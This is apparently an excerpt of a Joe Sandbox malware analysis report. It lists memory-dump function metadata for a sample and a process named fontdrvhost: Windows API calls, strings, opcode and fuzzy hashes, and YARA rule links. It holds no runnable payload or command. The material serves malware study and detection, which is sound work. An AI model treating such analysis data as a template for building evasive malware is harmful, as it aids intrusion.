                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: 015f6173c6cca95e2a9f003f702385792b721074b1431ddfb1c49ce1a42d422f
                                                                                                                    • Instruction ID: 6aba247aef89659204eef5cb933bf0aa643c876812fd6f41dc05afbb95499781
                                                                                                                    • Opcode Fuzzy Hash: 015f6173c6cca95e2a9f003f702385792b721074b1431ddfb1c49ce1a42d422f
                                                                                                                    • Instruction Fuzzy Hash: 1921C6729083165ADB31EA64EA55F6FB3DCDFA2750F0504BAF540C3241EB65DD4883B2
                                                                                                                    Function 00B8F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8F2E4
                                                                                                                      • Part of subcall function 00B8F2C5: GetProcAddress.KERNEL32(00BC81C8,CryptUnprotectMemory), ref: 00B8F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00B8F33E), ref: 00B8F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 00B8F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 00B8F389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: cb97e2040eb0b2c03e543663f4df47c00cb101d0c8ef9d78c2d83e27e1d1501b
                                                                                                                    • Instruction ID: 72fb54773f9f54bff9c0d6d4fa70122711fc983929022193da0de3fee48bd193
                                                                                                                    • Opcode Fuzzy Hash: cb97e2040eb0b2c03e543663f4df47c00cb101d0c8ef9d78c2d83e27e1d1501b
                                                                                                                    • Instruction Fuzzy Hash: 0311D33160062AABDF16BF25DC45A7E37D5FF04B60B1441AAFC416B271DE749E01CB98
                                                                                                                    Function 00B8B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B8B9B8
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                    • Opcode ID: c2d87e870c9eff3f42ae9e99b42a5f4ddef2e24e4756a42e80eed9e654270042
                                                                                                                    • Instruction ID: 57a361b217bf886edc3fb61af3e4fe9dfe4fbc99b4048273e5f83c72507caee3
                                                                                                                    • Opcode Fuzzy Hash: c2d87e870c9eff3f42ae9e99b42a5f4ddef2e24e4756a42e80eed9e654270042
                                                                                                                    • Instruction Fuzzy Hash: E701F163504312699A34BB798C82D6BA7ECEF92770B40488AF545D61A2EF30D840C3B1
                                                                                                                    Function 00B9101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00B91160,?,00000000,00000000), ref: 00B91043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00B9108A
                                                                                                                      • Part of subcall function 00B86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86C54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                    • Opcode ID: acd089787438e4bec44a634f2795b61f799ad09367fd9c68b2db91185feb9719
                                                                                                                    • Instruction ID: 8106199d5dd36824794ac7f1a71d5bcdf33d669e658cf75e4f3ea33c8bb5117b
                                                                                                                    • Opcode Fuzzy Hash: acd089787438e4bec44a634f2795b61f799ad09367fd9c68b2db91185feb9719
                                                                                                                    • Instruction Fuzzy Hash: 7401D6B634430A6FD7306E68AC51F76B3D8FB40751F2008BEF686A2291CEE168849724
                                                                                                                    Function 00B81316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8E2E8: _swprintf.LIBCMT ref: 00B8E30E
                                                                                                                      • Part of subcall function 00B8E2E8: _strlen.LIBCMT ref: 00B8E32F
                                                                                                                      • Part of subcall function 00B8E2E8: SetDlgItemTextW.USER32(?,00BBE274,?), ref: 00B8E38F
                                                                                                                      • Part of subcall function 00B8E2E8: GetWindowRect.USER32(?,?), ref: 00B8E3C9
                                                                                                                      • Part of subcall function 00B8E2E8: GetClientRect.USER32(?,?), ref: 00B8E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                    • SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                    • Opcode ID: b1d54b664207af32de63f0434a1a4ffaf06bcc12b21ae65245396fcb529e0ef0
                                                                                                                    • Instruction ID: bcdb2b6f93c445e08667589fff7e4f408e4a2603dffc28fc9727907e6a9df12f
                                                                                                                    • Opcode Fuzzy Hash: b1d54b664207af32de63f0434a1a4ffaf06bcc12b21ae65245396fcb529e0ef0
                                                                                                                    • Instruction Fuzzy Hash: 7EF08C30105288BBDF152F68880DBEA3BECEB00744F048998FC46665B2CB74C992EB18
                                                                                                                    Function 00B90FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00B91206,?), ref: 00B90FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00B90FF6
                                                                                                                      • Part of subcall function 00B86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B90FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    • Opcode ID: 73f1a4d2042ce89506955e41324c69fb8e85de7cb94a55155a7dc606342792c5
                                                                                                                    • Instruction ID: 25cbf7504cc1b3d5d0680921a78428939a7b88a83bb255e4ebf398e05afd6c1c
                                                                                                                    • Opcode Fuzzy Hash: 73f1a4d2042ce89506955e41324c69fb8e85de7cb94a55155a7dc606342792c5
                                                                                                                    • Instruction Fuzzy Hash: 86D02B3250C5303BCA1033285D05E7E39C4DF12731F500B94F038611F2CF6149819791
                                                                                                                    Function 00B8E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00B8DA55,?), ref: 00B8E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B8DA55,?), ref: 00B8E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    • Opcode ID: c460efd631a80004fde5bdb07692c836d7bd794fcb0c06e94f8a587abddef3ad
                                                                                                                    • Instruction ID: 8e280dd1e7a3a94260e353196d47fdf8f257cdf9e5cf0b8fc6e51e52586bdc84
                                                                                                                    • Opcode Fuzzy Hash: c460efd631a80004fde5bdb07692c836d7bd794fcb0c06e94f8a587abddef3ad
                                                                                                                    • Instruction Fuzzy Hash: DEC01231288B20A7EA303B646C0DB876AD89F01F11F09058CB281EA2E1DAE5D980C7A0

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD34550D48 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Z_H
                                                                                                                    • API String ID: 0-3267294416
                                                                                                                    • Opcode ID: e93da0bbf4136a7ef2dca453967f74cf49fd51cfaa0848c26a20566ce9a07565
                                                                                                                    • Instruction ID: 295bb8b40fd380d45069a8c59ca70905b85f5439be69518d31f4ee4a945b569d
                                                                                                                    • Opcode Fuzzy Hash: e93da0bbf4136a7ef2dca453967f74cf49fd51cfaa0848c26a20566ce9a07565
                                                                                                                    • Instruction Fuzzy Hash: 47A1D462E0D69A4FE74A9B6888757B9BFE1FF5A310F4501BAD049D72E2CB7C5801C700
                                                                                                                    Function 00007FFD34550E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 919edd5415e4d86f0e107f42d7dae88efaca302c304fa993dca2e11cd201f1d9
                                                                                                                    • Instruction ID: 31312083ed5b7357d12ea25be0f3f1e816dda2b96e82d736e865017ac53a5bf1
                                                                                                                    • Opcode Fuzzy Hash: 919edd5415e4d86f0e107f42d7dae88efaca302c304fa993dca2e11cd201f1d9
                                                                                                                    • Instruction Fuzzy Hash: 7B51C272A18A5A8FE798DB5C88657BABFE1FB9A310F9001BED009D77D1CBB81410C700
                                                                                                                    Function 00007FFD3494A4C1 Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HV[4
                                                                                                                    • API String ID: 0-1865321958
                                                                                                                    • Opcode ID: f6ba0d477b4afa37f5ff2c5c7533b2c4d0f77072057c4cd683398974d2d8df37
                                                                                                                    • Instruction ID: e472e3d5de8789f6e9664753cb27f1535305fc20d3191163438619cd7a85025f
                                                                                                                    • Opcode Fuzzy Hash: f6ba0d477b4afa37f5ff2c5c7533b2c4d0f77072057c4cd683398974d2d8df37
                                                                                                                    • Instruction Fuzzy Hash: FBD1DF30A1DB068FE369DB28D4E617577E1FF46310B20057EC58AC379ADE2CB8429B61
                                                                                                                    Function 00007FFD34941017 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8j4
                                                                                                                    • API String ID: 0-3311284346
                                                                                                                    • Opcode ID: 413df7a15074e3e76ad545ad7105749dbfc41249c6b9ffd3dcc6825a234ed554
                                                                                                                    • Instruction ID: b7d379f539918fc71fe274dfd2f8d7d69efdad16e6d4e50d1235c5ee95ba8761
                                                                                                                    • Opcode Fuzzy Hash: 413df7a15074e3e76ad545ad7105749dbfc41249c6b9ffd3dcc6825a234ed554
                                                                                                                    • Instruction Fuzzy Hash: CB71F435B0C4494BE768DB19C4AB9B537D0EF4A311B0002BDD25EC775BEE1CA8169691
                                                                                                                    Function 00007FFD34943E58 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 88e28dd701c5d053043bf718b294184e56b48ea262d953b7a0f54b0abcfea3bc
                                                                                                                    • Instruction ID: f6fdf1f57b59cfae4b0e9a532049dd047932e50fd21565c7e5ff0af92eda0b0d
                                                                                                                    • Opcode Fuzzy Hash: 88e28dd701c5d053043bf718b294184e56b48ea262d953b7a0f54b0abcfea3bc
                                                                                                                    • Instruction Fuzzy Hash: 3E515C71F0950A9FDB59DBA8C4A55BDB7B1EF49300F5041BED11AE7286CA386901CB60
                                                                                                                    Function 00007FFD34949208 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 0eea037c135cff10c0d50e45d277b9087e0a3bd175e0ab8e837991b3ab19b209
                                                                                                                    • Instruction ID: 5bd3513d8feebaeb86c985fa333b76eb31d210f0bce6430447d44cc144ab36d3
                                                                                                                    • Opcode Fuzzy Hash: 0eea037c135cff10c0d50e45d277b9087e0a3bd175e0ab8e837991b3ab19b209
                                                                                                                    • Instruction Fuzzy Hash: 3E515C31E0C64E9FDB59CBA8C4A59FDB7B5EF4A300F1041BED01AE7296CA386901DB10
                                                                                                                    Function 00007FFD34550998 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87`4
                                                                                                                    • API String ID: 0-1907778389
                                                                                                                    • Opcode ID: bfbcc4bb6c3fb1765c46189a2fa7c40d1f6ffb87a26c268e4634e32a505ef253
                                                                                                                    • Instruction ID: eee1575756ca111dc36a9b7f0d42a107099d8fd656b21212eaf8903a57026f39
                                                                                                                    • Opcode Fuzzy Hash: bfbcc4bb6c3fb1765c46189a2fa7c40d1f6ffb87a26c268e4634e32a505ef253
                                                                                                                    • Instruction Fuzzy Hash: 6631E321F189190FE758F76C84AE6BA76D1EB99321B4500B9E40EC32E3DD2CEC418641
                                                                                                                    Function 00007FFD349428BB Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: xj4
                                                                                                                    • API String ID: 0-3389405718
                                                                                                                    • Opcode ID: 8f702983f75b05e85e35d47e557146ff023ac6a7c170cd2d5c7cab72abdc2c15
                                                                                                                    • Instruction ID: 5b5dfce6ac42bfa971d5a795b77a08ef92e2664a242b5ac0dd163f008740b7d3
                                                                                                                    • Opcode Fuzzy Hash: 8f702983f75b05e85e35d47e557146ff023ac6a7c170cd2d5c7cab72abdc2c15
                                                                                                                    • Instruction Fuzzy Hash: 75211C71B1890A9BDB98DE18D4A19A8B3E2FF59350B144139D01ED368ADF28BC12DB80
                                                                                                                    Function 00007FFD3494947F Relevance: .4, Instructions: 403COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1fe70ec472c6e94fa389954704318535f5c79d4672b784a47d3dffbba322d3bd
                                                                                                                    • Instruction ID: c557d40bb82ac2e55797839055100a3edeb9c9315ab766854aa4e3a51b87baf7
                                                                                                                    • Opcode Fuzzy Hash: 1fe70ec472c6e94fa389954704318535f5c79d4672b784a47d3dffbba322d3bd
                                                                                                                    • Instruction Fuzzy Hash: CFF181306185568FEB59CF28C4E06B53BA5FF46310B5446BDC94ACB78ACA38E882CF51
                                                                                                                    Function 00007FFD349440CF Relevance: .4, Instructions: 401COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 43c1cd1dee217d10d8f721d370741b18285c59a2756c73dec369f4bc439a37cd
                                                                                                                    • Instruction ID: 6d43fc22881077dc4bc63891d7aaf01cc7e76f2970bd74baff679d829a007611
                                                                                                                    • Opcode Fuzzy Hash: 43c1cd1dee217d10d8f721d370741b18285c59a2756c73dec369f4bc439a37cd
                                                                                                                    • Instruction Fuzzy Hash: EDE1B230A18656CFEB59CF18C4E06B577A1FF4A304B5442BDC94ACB68EDA3CE881DB51
                                                                                                                    Function 00007FFD34945111 Relevance: .4, Instructions: 378COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7154f55ca6b7d78164f3c9e02677752f259dc4557fc206136af04c8b01314bb
                                                                                                                    • Instruction ID: 978846460115c8dbfa5c909476093e3600c8659c042257e44cdf586410c1f7ab
                                                                                                                    • Opcode Fuzzy Hash: b7154f55ca6b7d78164f3c9e02677752f259dc4557fc206136af04c8b01314bb
                                                                                                                    • Instruction Fuzzy Hash: A9D1D030A1CB068FD3A8CB68C0E557577E1FF46320B60457EC68EC7A8ADE2CB8429751
                                                                                                                    Function 00007FFD3494132D Relevance: .3, Instructions: 320COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d87c53153d3079136ec33b6726d7eb8b09d31a433ac9bc2f1d006adfd1955e0b
                                                                                                                    • Instruction ID: c3dcbe9c9de1f618742e764ffbf1f613bc8bcc2cc144fc81684dd9504b62ad29
                                                                                                                    • Opcode Fuzzy Hash: d87c53153d3079136ec33b6726d7eb8b09d31a433ac9bc2f1d006adfd1955e0b
                                                                                                                    • Instruction Fuzzy Hash: 16311422F0C55687E625EA6ED8BA0FC67945F42320F18027EC68ED62CADD4C784573A2
                                                                                                                    Function 00007FFD349440EF Relevance: .3, Instructions: 315COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4dea6112efc8456236208624a37577cb0b5273b4d7132cc0fc7b437d37affde9
                                                                                                                    • Instruction ID: 9c2d489f8af0d53091cb5c69ac476e9f6840d18dd9f5e36b3a7f59aec85ac4b0
                                                                                                                    • Opcode Fuzzy Hash: 4dea6112efc8456236208624a37577cb0b5273b4d7132cc0fc7b437d37affde9
